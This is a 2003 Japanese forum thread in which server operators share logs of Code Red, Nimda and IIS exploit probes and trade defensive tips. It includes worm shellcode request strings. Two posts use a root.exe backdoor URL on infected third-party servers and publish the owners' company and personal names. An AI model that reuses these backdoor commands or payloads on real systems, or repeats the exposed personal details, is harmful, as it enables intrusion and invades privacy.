%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000
%ue0ff%u9090=x&\x90\x90\x90\x90\x90\x90\x90\x90\x90
x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\xeb\t\x90\x90\x90_\
xeb\b\x90\x90\x90\xe8\xf5\xff\xff\xff\x8do\xf0 x8d}-\
x90\x90\x90\x8b\xf7f\xb8H\x063 ...
<以下略、とても長い>

174 :DNS未登録さん:03/06/01 07:30 ID:???
>>173
それうちにも来た。
そのあとなんか意味不明な文字があってしかもログが改行されちゃう。
何なのそれ?

175 :DNS未登録さん:03/06/01 13:04 ID:???
>>174
http://pc2.2ch.net/test/read.cgi/mysv/1044200633/170

176 :DNS未登録さん:03/06/10 00:05 ID:???
久々にIRC繋いだら、こんなん帰ってきたのだが…
irc.nara.wide.ad.jp - - [09/Jun/2003:23:40:24 +0900] "CONNECT 192.244.23.4:6667 HTTP/1.0" 403 1272

ワームチェックかなんかでしょうか?

177 : :03/06/14 03:18 ID:???
http://yahoobb219055208068.bbtec.net/

バッチリ幹線してるようです。
[2ch@localhost 2ch]wget --spider http://yahoobb219055208068.bbtec.net/
1 HTTP/1.1 200 OK
2 Server: Microsoft-IIS/5.0
3 Date: Fri, 13 Jun 2003 18:18:56 GMT
4 Connection: keep-alive
5 Connection: Keep-Alive
6 Content-Length: 1230
7 Content-Type: text/html
8 Set-Cookie: ASPSESSIONIDQQQQGSUC=KOPNHKABOIBNMLOKLKJJABEE; path=/
9 Cache-control: private
200 OK

どうやって警告したらいいでしょうか。

178 : :03/06/14 03:21 ID:???
ftpとか開いてるし、アノニログインできるし(;´Д`)
厨房運営の鯖でしょうか。

Port State Service
7/tcp open echo
9/tcp open discard
13/tcp open daytime
17/tcp open qotd
19/tcp open chargen
21/tcp open ftp
25/tcp open smtp
80/tcp open http
135/tcp open loc-srv
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
443/tcp open https
445/tcp filtered microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
6699/tcp open napster

179 : :03/06/14 03:25 ID:???
いろいろ情報が見れて楽しいね、他にもっと見れる情報無いかな?

htp://yahoobb219055208068.bbtec.net/scripts/root.exe?/c+type+"..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log"

アプリケーション例外が発生しました:
アプリケーション: (pid=1020)
発生時間: 2003/05/01 @ 21:50:51.907
例外番号: c0000005 (アクセス違反)

*----> システム情報 <----*
コンピュータ名: VFGYARXITW27V4Y
ユーザー名: Administrator
プロセッサの数: 1
プロセッサの種類: x86 Family 6 Model 8 Stepping 6
Windows 2000 Version: 5.0
現在のビルド: 2195
Service Pack: None
現在のタイプ: Uniprocessor Free
登録されている会社名: 日本フレートライナー(株)
登録されている所有者: 山ア勝行


180 :DNS未登録さん:03/06/14 05:53 ID:???
>>179
通報しますた。

181 :DNS未登録さん:03/06/14 07:32 ID:CsSAkb5z
キタ━━━━━(゚∀゚)━━━━━!!!!
http://homepage3.nifty.com/coco-nut/

182 :DNS未登録さん:03/06/14 10:32 ID:O9Qyx1v0
これはもう警鐘モンだぞ。
パッチも当てない危機感のないバカは鯖なんぞ立てるな。迷惑だ。

212.165.132.144 - - [14/Jun/2003:07:43:54 +0900] "GET /default.ida?XXXXXXXXX(rya

http://212.165.132.144/scripts/root.exe?/c+type+"..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log"

Application exception occurred:
App: (pid=1568)
When: 6/2/2003 @ 02:07:38.527
Exception number: c0000005 (access violation)

*----> System Information <----*
Computer Name: CISCO-ACS
User Name: Administrator
Number of Processors: 1
Processor Type: x86 Family 6 Model 8 Stepping 10
Windows 2000 Version: 5.0
Current Build: 2195
Service Pack: None
Current Type: Uniprocessor Free
Registered Organization: prestel
Registered Owner: okada

okadaって日本人か?

183 :DNS未登録さん:03/06/14 12:11 ID:???
(´-`).。oO(不正にアクセスして個人情報開示してるバカだよなぁ・・・)

184 :DNS未登録さん:03/06/14 12:25 ID:???
日本の法律では認証を掛けてないところにアクセスしても罪にならなかったような

185 :DNS未登録さん:03/06/14 12:29 ID:???
ややグレーゾーンに近いがな。
インデックスリストが丸見えになってて、顧客情報が見られたのを不正アクセスされたと逝ってるのと同じようなもんでしょ。

186 :DNS未登録さん:03/06/14 22:35 ID:???
わたしのホームページへアクセスした人は、不正アクセスでタイーホしてもらいます(w

187 :DNS未登録さん:03/06/16 06:20 ID:???
Code Green のベータ版バイナリを手に入れたので中をのぞいてみたのだが、
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
は Code Green の物らしい。
ウイルスだった事には変わりは無いわけだが。

188 :187:03/06/16 06:22 ID:???
あ、その下の物の方が重要っぽい。失礼

189 :DNS未登録さん:03/06/17 18:35 ID:???
かぎの開いている家に侵入して情報ファイルを持ち出したら
そいつは窃盗罪だろう。

不正アクセス防止法にはひっかからんかもしらんけど、盗んだ情報を
公開したりしてなにか損害が起きればけっこう痛いことになるかもね


190 :DNS未登録さん:03/06/25 00:41 ID:???
保守age

191 :DNS未登録さん:03/06/25 18:58 ID:wfI9oVW0
超過激ライブチャット登場!!!!!

あなたの命令で若い娘たちがヌレヌレモードへ

☆★アメリカ西海岸発☆★モザイクなし☆★

あなたの言葉で・・・ヌードにさせてください
あなたの指で・・・感じさせてください
あなたの声で・・・イ・カ・セ・テ・ください
寂しがりやの留学生の若い娘がお待ちしております!

ただいま、10分間無料で体験できるほか7日間会費無料!!

http://www.gals-cafe.com

192 :DNS未登録さん:03/06/27 23:41 ID:???
>>190
喪前がageるから・・・

193 :DNS未登録さん:03/07/03 03:00 ID:???
6月分のcodered。
01/Jun/2003 30
02/Jun/2003 37
03/Jun/2003 24
04/Jun/2003 31
05/Jun/2003 30
06/Jun/2003 24
07/Jun/2003 24
08/Jun/2003 27
09/Jun/2003 31
10/Jun/2003 38
11/Jun/2003 30
12/Jun/2003 37
13/Jun/2003 40
14/Jun/2003 20
15/Jun/2003 25
16/Jun/2003 33
17/Jun/2003 27
18/Jun/2003 22
19/Jun/2003 21
20/Jun/2003 28
21/Jun/2003 24
22/Jun/2003 22
23/Jun/2003 27
24/Jun/2003 34
25/Jun/2003 26
26/Jun/2003 32
27/Jun/2003 33
28/Jun/2003 32
29/Jun/2003 24
30/Jun/2003 16

194 :DNS未登録さん:03/07/05 03:27 ID:???
これワーム関係?初めて見たんだけど
それともアタック?
2003/07/05,01:55:31,,"","-",GET,"/.pl","-","-",403,266,"-","-"
2003/07/05,01:55:39,,"","-",GET,"/_vti_bin/shtml.dll","-","-",404,277,"-","-"
2003/07/05,01:55:39,,"","-",GET,"/_vti_bin/shtml.exe","-","-",404,277,"-","-"
2003/07/05,01:55:40,,"","-",GET,"/_vti_inf.html","-","-",404,272,"-","-"
2003/07/05,01:55:41,,"","-",GET,"/_vti_pvt/administrators.pwd","-","-",404,286,"-","-"
2003/07/05,01:55:41,,"","-",GET,"/_vti_pvt/authors.pwd","-","-",404,279,"-","-"
2003/07/05,01:55:42,,"","-",GET,"/_vti_pvt/service.pwd","-","-",404,279,"-","-"
2003/07/05,01:55:42,,"","-",GET,"/_vti_pvt/users.pwd","-","-",404,277,"-","-"
2003/07/05,01:55:43,,"","-",GET,"/abc/showcode.asp","-","-",404,275,"-","-"
2003/07/05,01:55:43,,"","-",GET,"/carbo.dll","-","-",404,268,"-","-"
2003/07/05,01:55:44,,"","-",GET,"/cfdocs/expelval/displayopenedfile.cfm","-","-",404,296,"-","-"
2003/07/05,01:55:45,,"","-",GET,"/cfdocs/expelval/exprcalc.cfm","-","-",404,287,"-","-"
2003/07/05,01:55:45,,"","-",GET,"/cfdocs/expelval/openfile.cfm","-","-",404,287,"-","-"
2003/07/05,01:55:46,,"","-",GET,"/cfdocs/expelval/sendmail.cfm","-","-",404,287,"-","-"
2003/07/05,01:55:49,,"","-",GET,"/cgi-bin/aglimpse","-","-",403,279,"-","-"
2003/07/05,01:55:49,,"","-",GET,"/cgi-bin/AnyForm2","-","-",403,279,"-","-"
2003/07/05,01:55:50,,"","-",GET,"/cgi-bin/AT-admin.cgi","-","-",403,283,"-","-"
2003/07/05,01:55:51,,"","-",GET,"/cgi-bin/bnbform.cgi","-","-",403,282,"-","-"
2003/07/05,01:55:51,,"","-",GET,"/cgi-bin/campas","-","-",403,277,"-","-"
2003/07/05,01:55:52,,"","-",GET,"/cgi-bin/cgiwrap","-","-",403,278,"-","-"
全67行

195 :DNS未登録さん:03/07/05 04:45 ID:???
アクセスしようとしてるファイル名から推測すると
IIS狙いのワームでないかい?

うちにはまだお見えになられてないです

196 :DNS未登録さん:03/07/05 14:20 ID:???
>>194
> 2003/07/05,01:55:52,,"","-",GET,"/cgi-bin/cgiwrap","-","-",403,278,"-","-"

cgiwrapの設定不備狙ってる?
IIS狙いとは言い切れない予感。

例の改ざん祭りの下準備かも((((((;゚Д゚))))))ガクガクブルブル


197 :DNS未登録さん:03/07/05 17:11 ID:???
>196

祭りドコー?


198 :DNS未登録さん:03/07/06 03:35 ID:???
http://news2.2ch.net/test/read.cgi/newsplus/1057237070/

199 :山崎 渉:03/07/15 11:10 ID:???

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

200 :DNS未登録さん:03/07/26 11:29 ID:???
孫さん家の人が衛生管理していないので、「出禁」にしています。
衛生管理出来る様になったら、タイム系サーバーを追加して
監視兵を置くかな・・・

201 :DNS未登録さん:03/07/29 04:10 ID:???
そういえばどこかの検索エンジンのロボットはワームみたいな動きをしていくな。

202 :DNS未登録さん:03/07/29 14:30 ID:???
最近、損さん家のf@t息子が猛烈アタックしてきます。
UDPの3010・3012・3013と投げてくるけど、これ何でしょ?

203 :DNS未登録さん:03/07/29 17:23 ID:???
ロボットといえばnabotは迷惑だ

204 :ぼるじょあ ◆ySd1dMH5Gk :03/08/02 05:04 ID:???
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ

205 :DNS未登録さん:03/08/05 10:38 ID:???
これって何かのウイルス?
今朝会社にきたら、↓と同じぺージに書き換えられてた。
http://217.127.31.195/index.htm

やられて放置してる鯖もイパーイなんですが・・・。↓
http://www.google.co.jp/search?q=Copyright+by+Seyeon+TECH+Co.%2C+Ltd.&ie=UTF-8&oe=UTF-8&hl=ja&lr=
なんやのこれ〜〜〜!

206 :DNS未登録さん:03/08/05 10:39 ID:FAyYsQpc
あげ

207 :DNS未登録さん:03/08/05 11:08 ID:???
>>205
なんで書き換えられちゃうわけ?あなたの会社のサイト
ろくにパッチも当ててないDQN鯖官なのけ

208 :205:03/08/05 11:11 ID:???
>>207
ごめん、動揺して説明たらずだった。

会社きて、自宅のHP見てみようとしたら、書き換えられてた。
自宅鯖はルータでHTTP、FTP,DNS,SSLのポートしか空けてねえです。

はぁ…

209 :DNS未登録さん:03/08/05 11:16 ID:???
>>208
なんか穴があるんだろうね
いい機会だから徹底的にしらべましょう

210 :DNS未登録さん:03/08/05 11:20 ID:???
この会社に恨みがある奴がやりまくったのかな

211 :205:03/08/05 11:21 ID:???
SSLとBINDがあやしいっすね。
最近会社忙しく自宅鯖放置気味だったからバチが当たったなー…

なんていうか、自宅に帰る7時半まで手を出せないのがもどかしい…

212 :DNS未登録さん:03/08/05 12:56 ID:???
atfr064007013.do.ppp.infoweb.ne.jp - - [04/Aug/2003:01:02:25 +0900] "GET /defaul
t.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u68
58%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190
%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 332 "-" "-"
yahoobb219214144203.bbtec.net - - [04/Aug/2003:12:12:29 +0900] "GET /default.ida
?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%uc
bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c
3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 332 "-" "-"

この2ホスト、ここ1ヶ月ほど止まらない。
毎日回線を切ってるのか、IPアドレスは毎回変わるんだが・・・
そろそろISPのabuseにでも連絡すっかな。

213 :DNS未登録さん:03/08/05 15:36 ID:???
>>212
> 毎日回線を切ってるのか、IPアドレスは毎回変わるんだが・・・

・・・。

214 :DNS未登録さん:03/08/05 20:59 ID:qWW0gjj4
ウィルス、ワーム対策としてモデムとサーバの間にルータを噛ませてさらにサーバ、
クライアントにはウィルス対策ソフトをインストールする程度ではまだ足りないでしょうか?
もちろんウィンドウのアップデート、パッチは最新のものをなるべく早く当てるようにします。

215 :DNS未登録さん:03/08/05 21:16 ID:???
>>214
根本的にだめ。
ウイルス、ワーム、セキュリティについてのポリシーを
自分で確立すべし

216 :DNS未登録さん:03/08/06 19:31 ID:???
俺の自宅サーバーにおけるセキュリティについての考え方のひとつに
「稼動時間を減らす」てのあるけど誰も賛同してくれん。
「馬鹿じゃねぇ?」「使えねぇ!」の連呼









うるせー馬鹿!

217 :DNS未登録さん:03/08/06 20:44 ID:???
>>216
いや、科学技術庁も導入したぐらいだし(藁

218 :DNS未登録さん:03/08/06 21:29 ID:???
稼働時間を減らしたところで、穴をあけっぱなしにしていれば頻繁にやってくるワームにやられるので
結局常時稼働とさほど変わらないんでないの?

セキュリティで最も重要なのは、穴をあけない、見つかったらすぐにふさぐという基本的な事項をしっかり行うこと。

219 :DNS未登録さん:03/08/09 14:49 ID:???
うちは、CodeRedが30〜40件/日、ほとんどが韓国と中国
それから、Nimdaも30〜40連続アタック
[error][client 61.213.32.47] 千葉のCATV局だ。もー頼むよ・・・。

220 :DNS未登録さん:03/08/09 15:00 ID:???
うちも先月までは>>219とほぼ同量のアタックがあったんだが、
1週間程度、接続元IPが韓国・中国・台湾のパケットを総蹴りにしたら
解除した後もなぜかアタックが以前より減少してる


221 :DNS未登録さん:03/08/09 20:59 ID:???
どれくらい来てるのかな?とオモテ2002年10月以降のログを一括検索したら4609件出てきた。
ヽ(`Д´)ノウワァァァン

222 :DNS未登録さん:03/08/11 04:02 ID:???
Nimdaの時に比べたらかなり平和だよな。
あのときはピーク時で1分間に2〜3回アクセスが続いたし。
帰省中だったので放置しているうちにログが肥大化して帰ってきたらfile system fullでかなり焦った。

223 :山崎 渉:03/08/15 22:39 ID:???
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

224 :DNS未登録さん:03/08/16 09:01 ID:???
今度は135の悪夢

225 :DNS未登録さん:03/09/04 02:11 ID:LR09Pn2s
保守age

226 :DNS未登録さん:03/09/05 21:06 ID:???
パケット通信危うし・・・

納入先監視装置、今月は1万円を越えました×n台
この先どうなることやら・・・

227 :DNS未登録さん:03/09/10 01:25 ID:???
yahoobb219178230052.bbtec.net [10/Sep/2003:00:47:47 +0900] "GET / HTTP/1.1" "-"

デザインが変...

228 :DNS未登録さん:03/09/21 00:51 ID:WMVqyFB1
もう ahooBB 大迷惑。パッチ宛ててるのかどうか知らんけど。
当ててたとしたら、肝心の駆除してねぇヤツ多すぎ。
全部 bbtec.net 遮断に決定。俺は困らねぇし。

229 :DNS未登録さん:03/09/21 01:06 ID:yExHdUrY
UDP LOOPアタックくらいまくりなんですがどうしたらいいですか?
特定の相手難ですが。

230 :DNS未登録さん:03/09/21 23:20 ID:hhJEgwIw
2003/09/21(23:14:55) W-SV 218.188.110.35 [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0"
2003/09/21(23:15:01) W-SV 218.188.110.35 [80] 404 240 "GET /msadc/root.exe?/c+dir HTTP/1.0"
2003/09/21(23:15:06) W-SV 218.188.110.35 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/09/21(23:15:12) W-SV 218.188.110.35 [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"

パッチ当ててない鯖って周りにも迷惑かけて最悪だな

231 :DNS未登録さん:03/09/22 00:48 ID:zRSNpj4D
ahooBBキター

2003/09/22(00:25:32) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0"
2003/09/22(00:25:33) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 404 240 "GET /msadc/root.exe?/c+dir HTTP/1.0"
2003/09/22(00:25:33) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/09/22(00:25:33) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/09/22(00:25:33) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 403 262 "GET /scripts/..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0"


232 :困ってるよん:03/09/22 22:08 ID:16HVoww6
IPアドレスを変えてSEARCHをかけて来てます、どうしたらいいでしょうか?
これずっとやられて、アクセス数がどんどん増えて行ってしまいます。
同時接続数が限られる環境でこの攻撃は痛いです。
だれか辞めさせる手段をご教授お願いします。
2003-09-22 11:56:38 140.112.88.18 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 11:58:03 67.128.66.123 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 11:58:04 67.128.66.123 - "" SEARCH / - 411 -
2003-09-22 12:07:06 12.168.146.99 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:07:06 12.168.146.99 - "" SEARCH / - 411 -
2003-09-22 12:10:31 62.254.0.18 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:10:31 62.254.0.18 - "" SEARCH / - 411 -
2003-09-22 12:12:38 202.64.33.192 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:12:38 202.64.27.183 - "" SEARCH / - 411 -
2003-09-22 12:13:48 81.152.119.97 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:13:48 81.152.119.97 - "" SEARCH / - 411 -
2003-09-22 12:18:41 80.222.212.13 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:18:42 80.222.212.13 - "" SEARCH / - 411 -
2003-09-22 12:19:39 194.100.73.249 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:19:39 194.100.73.249 - "" SEARCH / - 411 -
2003-09-22 12:22:34 219.0.96.166 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:22:34 219.0.96.166 - "" SEARCH / - 411 -
2003-09-22 12:31:35 81.106.226.196 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:31:36 81.106.226.196 - "" SEARCH / - 411 -
2003-09-22 12:33:22 220.36.28.75 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:33:22 220.36.28.75 - "" SEARCH / - 411 -
2003-09-22 12:39:38 68.75.21.33 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:39:38 68.75.21.33 - "" SEARCH / - 411 -
2003-09-22 12:49:59 4.65.242.242 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:49:59 4.65.242.242 - "" SEARCH / - 411 -
2003-09-22 12:50:56 61.242.82.156 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:50:56 61.242.82.156 - "" SEARCH / - 411 -
2003-09-22 12:52:25 68.122.155.202 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:52:25 68.122.155.202 - "" SEARCH / - 411 -
2003-09-22 12:52:55 63.196.240.140 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:52:57 63.196.240.140 - "" SEARCH / - 411 -
2003-09-22 12:57:34 67.115.71.91 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:57:34 67.115.71.91 - "" SEARCH / - 411 -
2003-09-22 12:58:18 217.32.133.75 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:58:21 217.32.133.75 - "" SEARCH / - 411 -
2003-09-22 13:01:16 138.23.162.248 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 13:01:16 138.23.162.248 - "" SEARCH / - 411 -


233 :DNS未登録さん:03/09/22 22:16 ID:9mxWCQXY
ホウムペイジ作り中だよっ
http://azarashi.ddo.jp/

234 :sage:03/09/23 01:18 ID:AzHK5NDc
うちのSnortSnarfの警告ページね。


2つの異なるイグネチャーが219.96.206.60として存在しています。発信源

・65個の事例はWEB-IIS ISAPI .ida attempt
・65個の事例はWEB-IIS cmd.exe access

ここ学校なんだよね〜
あまりにウザイからwhoisでわざわざ調べて
メールで教えてあげようと思ったら。
failure noticeときたもんだ!

管理ちゃんとしようよー





235 :DNS未登録さん:03/09/23 12:08 ID:???
>>234
219.96.206.60 = haruna.kibou.ed.jp
適当にpostmaster@とかwebmaster@に送ってみたらどうよ

236 :DNS未登録さん:03/09/25 17:34 ID:???
いまだにcoderedとかに感染している奴氏んでしまえばいいのに

237 :DNS未登録さん:03/09/25 17:59 ID:???
codegreenを(ry

238 :DNS未登録さん:03/11/02 17:33 ID:q0bLnL52
WINNTAutoAttackっていうんですかこれ?
221.194.178.13 - - [02/Nov/2003:14:52:31 +0900] "GET /NULL.IDA?CCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%u898b%u77e8%
u0000%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000%ue0ff%u9090=x&\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
(以下略)

中国人かな?

239 :DNS未登録さん:03/11/20 11:11 ID:Ie2pkvRt
taro.eco.saitama-u.ac.jp - - [20/Nov/2003:10:48:04 +0900] "GET /scripts/nsiislog.dll HTTP/" 404

240 :Hacktool.WKRShell:03/11/21 00:09 ID:???
http://www.symantec.com/region/jp/sarcj/data/h/hacktool.wsrshell.html

Hacktool.WKRShell
セキュリティホール memo
http://www.st.ryukoku.ac.jp/~kjm/security/memo/

Workstation サービスのバッファオーバーランにより、コードが実行される (828749) (MS03-049)
http://www.st.ryukoku.ac.jp/~kjm/security/memo/#20031112_MS03-049
EEYE: Windows Workstation Service Remote Buffer Overflow (eEye、2003.11.12)
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2003.11/msg00140.html
MS03-049が危険な理由 (ZDNet)
http://www.zdnet.co.jp/enterprise/0311/14/epn02.html

241 :DNS未登録さん:03/11/30 02:44 ID:fHEXUDOq
445 のアタックすさまじすぎ

242 :DNS未登録さん:03/11/30 13:08 ID:Wqab79f6
最近こんなのばっか
213.242.186.162 - - [30/Nov/2003:12:24:12 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
adsl-68-90-244-157.dsl.hstntx.swbell.net - - [30/Nov/2003:12:24:18 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
dyn-greek-180-227.dyn.columbia.edu - - [30/Nov/2003:12:25:06 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
63.172.94.170 - - [30/Nov/2003:12:27:53 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
adsl-63-202-55-65.dsl.frsn01.pacbell.net - - [30/Nov/2003:12:28:01 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
cache-2.sfrn.ca.webcache.rcn.net - - [30/Nov/2003:12:28:24 +0900] "GET / HTTP/1.0" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
061092205038.ctinets.com - - [30/Nov/2003:12:30:20 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
alb-24-194-36-62.nycap.rr.com - - [30/Nov/2003:12:32:56 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
adsl-66-143-248-208.dsl.snantx.swbell.net - - [30/Nov/2003:12:35:24 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
h-68-165-88-115.nycmny83.covad.net - - [30/Nov/2003:12:35:44 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
誰か対処法教えて…ログがわけわかんなくなる

243 :DNS未登録さん:03/11/30 13:47 ID:???
ウチは、ルータで Directed Broadcast 破棄しといた

244 :DNS未登録さん:03/12/01 00:13 ID:???
65-86-200-30.client.dsl.net - - [30/Nov/2003:20:32:26 +0900] "GET /scripts/nsiislog.dll" 404 315 -%
アメリカより。


245 :DNS未登録さん:03/12/02 14:27 ID:???
>>242
ping に反応しなきゃ送ってこない

246 :DNS未登録さん:03/12/03 18:21 ID:zykLI/Va
>>245
うちのルータもpingを排除したら迷惑な香具師も少なくなりますた

247 :DNS未登録さん:03/12/03 23:16 ID:???
一日1500くらいアタックがくるよ。
一分に一回程度。
やんなっちゃう。
真っ当なアクセスなら1500って夢のような数字だけどさ

ルータ新しいのにかえようかなあ
pingを排除できるルータがあるんならかえたい。
けど、金ない。
よわったのお

248 :DNS未登録さん:03/12/11 16:10 ID:???
>>247
iptables -A INPUT -p icmp -i ppp+ -j DROP
スレ違いレス

249 :DNS未登録さん:04/01/21 04:09 ID:???
なんかこのスレ見て自分の鯖が心配になってきた。
確認する方法と防ぐ方法きぼんぬ。

250 :DNS未登録さん:04/01/24 05:10 ID:???
OSがWindowsならWindowsUpだて汁!
他のOSはシラネ

251 :DNS未登録さん:04/01/27 02:10 ID:???
>>249
linuxとかにしる

252 :DNS未登録さん:04/01/27 19:07 ID:???
>>249
鯖の電源切れば心配しなくてもよくなるYO

253 :DNS未登録さん:04/01/28 16:31 ID:E31XDYJQ
良スレage

254 :DNS未登録さん:04/02/05 00:53 ID:???
同じIPから毎日のように来るので
調べてみたらどうやらクライアント機らしい。
同じ時間帯に集中するのは、その時間帯に電源入れてるから。
updateやウイルスチェックぐらいしろと…

255 :DNS未登録さん:04/02/05 01:15 ID:???
       巛彡彡ミミミミミ彡彡
       巛巛巛巛巛巛巛彡彡
   r、r.r 、|:::::           | 
  r |_,|_,|_,||::::::     ⌒   ⌒|
  |_,|_,|_,|/⌒     -="-  (-="    
  |_,|_,|_人そ(^i    '"" ) ・ ・)""ヽ  
  | )   ヽノ |.  ┃`ー-ニ-イ`┃    そうでっか、そうでっか、なるほどね
  |  `".`´  ノ   ┃  ⌒  ┃|  
  人  入_ノ´   ┃    ┃ノ\ 
/  \_/\\   ┗━━┛/ \\
      /   \ ト ───イ/   ヽヽ
     /      ` ─┬─ イ     i i
    /          |      Y  | |
    /           |      ヽ__|_|

       巛彡彡ミミミミミ彡彡
       巛巛巛巛巛巛巛彡彡
   r、r.r 、|:::::           |
  r |_,|_,|_,||::::::     /'  '\ |
